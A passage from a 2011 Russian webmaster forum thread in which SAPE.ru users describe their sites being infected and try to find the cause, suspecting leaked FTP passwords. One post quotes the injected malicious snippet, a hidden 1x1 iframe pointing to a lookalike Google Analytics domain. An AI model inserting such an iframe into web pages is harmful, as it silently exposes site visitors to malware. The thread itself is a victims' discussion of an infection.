Вернуться   Форум SAPE.RU > Система SAPE.ru > Ошибки при работе с системой

-->
Ответ
 
Опции темы
Старый 30.09.2011, 04:14   #31
Новичок
 
Регистрация: 25.01.2011
Сообщений: 8
Вес репутации: 0
Дмитрий Обзоров на пути к лучшему
По умолчанию

Цитата:
Сообщение от Салоед Посмотреть сообщение
Вот такая вот фигня на страничке появляется:

<!--a8998e--><iframe frameborder=0 height=1 width=1 scrolling=no src='http://a.cf-google-analytics.ru/main.php?page=09607b3072273d90'> </iframe><!--/a8998e-->
я как топикстартер подтверждаю, у меня такой же код был. Только хочу еще добавить, что код обнаружился вечером, и тогда он был закодирован и был очень длинным и непонятным. А утром принялся за очистку сайта - код уже был таким вот. Закодированный код тоже был в тегах <!--a8998e--><!--/a8998e-->

Добавлено через 19 минут
жду пока Яндекс снимет в поиске пометку что мой сайт опасен. после этого новый пароль к хостингу засвечу в настройках на сапе, проведу следственный эксперимент.
пока что новый пароль нигде не указывал и сайт не заражается.

заразны были все файлы html-сайта. но и на всех страницах есть теги сапы, в которых вставляется ссылка. ссылки продавались не со всех страниц.

Цитата:
Сообщение от Последний Герой Посмотреть сообщение
тогда как объяснить

???
элементарно. открывается хтмл-страничка из компа через фронт пейдж, при открытии подгружается вирусный файл, вирус палит что страничка на компе и как-то маскирует все содержимое хтмл-кода, которое находится в тегах <!--a8998e--><!--/a8998e--> КАК оно это делает - был бы программистом, были б варианты. Но то что я открываю один и тот же файл с компа и с инетом вредоносный код во фронт пейдже не виден а без инета виден - это факт. НО также еще и не видны ссылки САПЕ. вот ответ и на вопрос:
Цитата:
Насколько я понял, с блоками Сапе вирус непосредственно не связан, раз идет после </body>
как-то все таки связан, если и то и другое не было видно. возможно связан тегом вида <!--NECHTO--><!--/NECHTO-->

Еще раз повторю, я говорю о скачанных с инета уже зараженных файлах.

Цитата:
Сообщение от Салоед Посмотреть сообщение
Уже два раза удалял на всех сайтах. Код появляется снова, но не сразу. Через десять-тридцать минут. И пока что не на всех страницах.
Салоед, а при смене пароля вы новый пароль указывали в настройках Сапы?

Последний раз редактировалось Дмитрий Обзоров; 30.09.2011 в 04:15. Причина: Добавлено сообщение
Дмитрий Обзоров вне форума   Ответить с цитированием
Старый 30.09.2011, 04:19   #32
Специалист
 
Аватар для Салоед
 
Регистрация: 15.10.2010
Сообщений: 462
Вес репутации: 187
Салоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордится
По умолчанию

Да. Указывал.

Я вот что понять не могу: почему заразились старые сайты, а тот, который торгует в сапе лишь месяц - чистый... Может есть какая-то связь с последней вирусной атакой на сапу (она была как раз около месяца назад)?

Последний раз редактировалось Салоед; 30.09.2011 в 04:24.
Салоед вне форума   Ответить с цитированием
Старый 30.09.2011, 04:21   #33
Bannеd
 
Регистрация: 17.09.2008
Сообщений: 6,446
Вес репутации: 370
Последний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Дмитрий Обзоров Посмотреть сообщение
элементарно. открывается хтмл-страничка из компа через фронт пейдж, при открытии подгружается вирусный файл
в текстовом редакторе это просто текст, а не исполняемый код, ничего подгружаться не должно, если ранее не было.

Цитата:
Сообщение от Дмитрий Обзоров Посмотреть сообщение
Но то что я открываю один и тот же файл с компа и с инетом вредоносный код во фронт пейдже не виден а без инета виден - это факт
В блокноте надо попробовать.
Сразу возникает вопрос, а фронтпейдж Вы купили или украли?

Добавлено через 41 секунду
Цитата:
Сообщение от Салоед Посмотреть сообщение
Да. Указывал.
Надо сменить пароль и не указывать, если думаете на сапу.

Последний раз редактировалось Последний Герой; 30.09.2011 в 04:21. Причина: Добавлено сообщение
Последний Герой вне форума   Ответить с цитированием
Старый 30.09.2011, 04:54   #34
Новичок
 
Регистрация: 25.01.2011
Сообщений: 8
Вес репутации: 0
Дмитрий Обзоров на пути к лучшему
По умолчанию

Цитата:
в текстовом редакторе это просто текст, а не исполняемый код, ничего подгружаться не должно, если ранее не было.
где я писал про текстовый редактор?

Добавлено через 3 минуты
Цитата:
Сразу возникает вопрос, а фронтпейдж Вы купили или украли?
купил, лет десять назад на базаре гривен за 8, вместе со всем Офисом, с гордой припиской Service Pack 1 MUI.

А что?

Последний раз редактировалось Дмитрий Обзоров; 30.09.2011 в 04:55. Причина: Добавлено сообщение
Дмитрий Обзоров вне форума   Ответить с цитированием
Старый 30.09.2011, 04:57   #35
Модератор
 
Регистрация: 29.10.2007
Сообщений: 1,313
Вес репутации: 240
sin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордится
По умолчанию

Возможно, это действительно какая-то массовая атака, но ее связь с Сапой и с роботом ФТП мне совсем не очевидна. Иначе как объяснить тот факт, что вирус попадал на одни сайты и обходил другие (из подключенных по ФТП)? ЕСли бы через робота, скорее всего были бы все подряд, по очереди фтп-коннекта. У меня, кстати, тоже есть сайт, подключенный по ФТП. Щас перелопатил страницы - все ОК, вирусов нет, новые ссылки размещены буквально пару часов назад.
sin вне форума   Ответить с цитированием
Старый 30.09.2011, 05:00   #36
Новичок
 
Регистрация: 25.01.2011
Сообщений: 8
Вес репутации: 0
Дмитрий Обзоров на пути к лучшему
По умолчанию

Цитата:
Сообщение от Салоед Посмотреть сообщение
Да. Указывал.

Я вот что понять не могу: почему заразились старые сайты, а тот, который торгует в сапе лишь месяц - чистый... Может есть какая-то связь с последней вирусной атакой на сапу (она была как раз около месяца назад)?
а я не указывал и сайт остается чистым.
в общем, лично для меня вопрос риторический, откуда вирус. выжду какое-то время, пока вручную ссылки буду менять, благо не миллион страниц и всего 40 ссылок.
Дмитрий Обзоров вне форума   Ответить с цитированием
Старый 30.09.2011, 05:02   #37
Специалист
 
Аватар для Салоед
 
Регистрация: 15.10.2010
Сообщений: 462
Вес репутации: 187
Салоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордится
По умолчанию

Ладно. Время спать. Снова залил чистые файлы, завтра будет видно.

Спасибо всем тем, кто небезразличен. Сапа - наша кормилица!
Салоед вне форума   Ответить с цитированием
Старый 30.09.2011, 05:34   #38
Эксперт
 
Аватар для MonAmur
 
Регистрация: 03.07.2007
Адрес: Chinatown
Сообщений: 7,265
Вес репутации: 611
MonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Последний Герой Посмотреть сообщение
а фронтпейдж Вы купили или украли?
Цитата:
Сообщение от Дмитрий Обзоров Посмотреть сообщение
купил, лет десять назад на базаре гривен за 8, вместе со всем Офисом, с гордой припиской Service Pack 1 MUI
давно так не смеялся

Дмитрий Обзоров, а хостер кто?
MonAmur вне форума   Ответить с цитированием
Старый 30.09.2011, 05:46   #39
Новичок
 
Регистрация: 25.01.2011
Сообщений: 8
Вес репутации: 0
Дмитрий Обзоров на пути к лучшему
По умолчанию

тутхост уа
Дмитрий Обзоров вне форума   Ответить с цитированием
Старый 30.09.2011, 09:17   #40
Новичок
 
Регистрация: 27.10.2010
Сообщений: 13
Вес репутации: 0
vss18 на пути к лучшему
По умолчанию

На нескольких статичных сайтах перезаписался htaccess плюс в корне появился некий странный файл с расширением .zip. HTML-файлы еще не проверял.
vss18 вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Код google analytics vasilchenko Разработка и сопровождение сайтов 3 28.05.2011 22:54
Объединение Google AdSense и Google Analytics magura888 Google, MSN, Yahoo 10 23.11.2009 23:23
Google Analytics Bessel Google, MSN, Yahoo 2 22.05.2008 00:20
Вставка кода сапы в несколько сотен HTML-страниц leszkin Курилка 6 15.09.2007 12:52
Google AdSense & Google Analytics tpnetman Контекстная реклама 12 20.06.2007 02:36


Часовой пояс GMT +3, время: 23:29.